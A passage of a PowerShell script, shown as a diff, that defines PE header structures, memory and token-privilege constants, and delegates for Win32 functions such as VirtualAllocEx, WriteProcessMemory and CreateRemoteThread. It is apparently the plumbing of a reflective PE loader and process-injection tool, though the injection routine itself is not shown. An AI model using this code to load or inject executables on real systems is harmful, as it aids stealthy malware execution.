($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null + ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null + ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null + ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null + ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null + ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null + ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null + ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null + ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null + ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null + ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null + ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null + ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null + ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null + ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null + ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null + ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null + ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null + ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null + ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null + ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null + ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null + ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null + ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null + ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null + ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null + ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null + ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null + ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null + ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null + ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null + ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null + $IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64 + + #Struct IMAGE_OPTIONAL_HEADER32 + $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224) + ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null + ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null + ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null + ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null + ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null + ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null + ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null + ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null + ($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null + ($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null + ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null + ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null + ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null + ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null + ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null + ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null + ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null + ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null + ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null + ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null + ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null + ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null + ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null + ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null + ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null + ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null + ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null + ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null + ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null + ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null + ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null + ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null + ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null + ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null + ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null + ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null + ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null + ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null + ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null + ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null + ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null + ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null + ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null + ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null + ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null + ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null + $IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32 + + #Struct IMAGE_NT_HEADERS64 + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264) + $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null + $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null + $IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64 + + #Struct IMAGE_NT_HEADERS32 + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248) + $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null + $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null + $IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32 + + #Struct IMAGE_DOS_HEADER + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64) + $TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null + + $e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal') + $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray + $FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst')) + $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4)) + $e_resField.SetCustomAttribute($AttribBuilder) + + $TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null + + $e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal') + $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray + $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10)) + $e_res2Field.SetCustomAttribute($AttribBuilder) + + $TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null + $IMAGE_DOS_HEADER = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER + + #Struct IMAGE_SECTION_HEADER + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40) + + $nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal') + $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray + $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8)) + $nameField.SetCustomAttribute($AttribBuilder) + + $TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null + $IMAGE_SECTION_HEADER = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER + + #Struct IMAGE_BASE_RELOCATION + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8) + $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null + $IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION + + #Struct IMAGE_IMPORT_DESCRIPTOR + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20) + $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null + $IMAGE_IMPORT_DESCRIPTOR = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR + + #Struct IMAGE_EXPORT_DIRECTORY + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40) + $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null + $IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY + + #Struct LUID + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8) + $TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null + $LUID = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value $LUID + + #Struct LUID_AND_ATTRIBUTES + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12) + $TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null + $TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null + $LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value $LUID_AND_ATTRIBUTES + + #Struct TOKEN_PRIVILEGES + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16) + $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null + $TOKEN_PRIVILEGES = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value $TOKEN_PRIVILEGES + + return $Win32Types + } + + Function Get-Win32Constants + { + $Win32Constants = New-Object System.Object + + $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000 + $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000 + $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01 + $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02 + $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04 + $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08 + $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10 + $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20 + $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40 + $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80 + $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000 + $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -Value 0x40 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_NX_COMPAT -Value 0x100 + $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000 + $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_QUERY -Value 0x0008 + $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_ADJUST_PRIVILEGES -Value 0x0020 + $Win32Constants | Add-Member -MemberType NoteProperty -Name SE_PRIVILEGE_ENABLED -Value 0x2 + $Win32Constants | Add-Member -MemberType NoteProperty -Name ERROR_NO_TOKEN -Value 0x3f0 + + return $Win32Constants + } + + Function Get-Win32Functions + { + $Win32Functions = New-Object System.Object + + $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc + $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr]) + $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate) + $Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc + + $VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx + $VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr]) + $VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate) + $Win32Functions | Add-Member NoteProperty -Name VirtualAllocEx -Value $VirtualAllocEx + + $memcpyAddr = Get-ProcAddress msvcrt.dll memcpy + $memcpyDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr]) + $memcpy = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value $memcpy + + $memsetAddr = Get-ProcAddress msvcrt.dll memset + $memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr]) + $memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value $memset + + $LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA + $LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr]) + $LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value $LoadLibrary + + $GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress + $GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr]) + $GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value $GetProcAddress + + $GetProcAddressOrdinalAddr = Get-ProcAddress kernel32.dll GetProcAddress + $GetProcAddressOrdinalDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([IntPtr]) + $GetProcAddressOrdinal = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressOrdinalAddr, $GetProcAddressOrdinalDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddressOrdinal -Value $GetProcAddressOrdinal + + $VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree + $VirtualFreeDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32]) ([Bool]) + $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate) + $Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree + + $VirtualFreeExAddr = Get-ProcAddress kernel32.dll VirtualFreeEx + $VirtualFreeExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) ([Bool]) + $VirtualFreeEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeExAddr, $VirtualFreeExDelegate) + $Win32Functions | Add-Member NoteProperty -Name VirtualFreeEx -Value $VirtualFreeEx + + $VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect + $VirtualProtectDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]) + $VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate) + $Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect + + $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA + $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr]) + $GetModuleHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate) + $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle + + $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary + $FreeLibraryDelegate = Get-DelegateType @([Bool]) ([IntPtr]) + $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary + + $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess + $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr]) + $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenProcess -Value $OpenProcess + + $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject + $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [UInt32]) ([UInt32]) + $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name WaitForSingleObject -Value $WaitForSingleObject + + $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory + $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool]) + $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value $WriteProcessMemory + + $ReadProcessMemoryAddr = Get-ProcAddress kernel32.dll ReadProcessMemory + $ReadProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool]) + $ReadProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ReadProcessMemoryAddr, $ReadProcessMemoryDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name ReadProcessMemory -Value $ReadProcessMemory + + $CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread + $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]) + $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateRemoteThread -Value 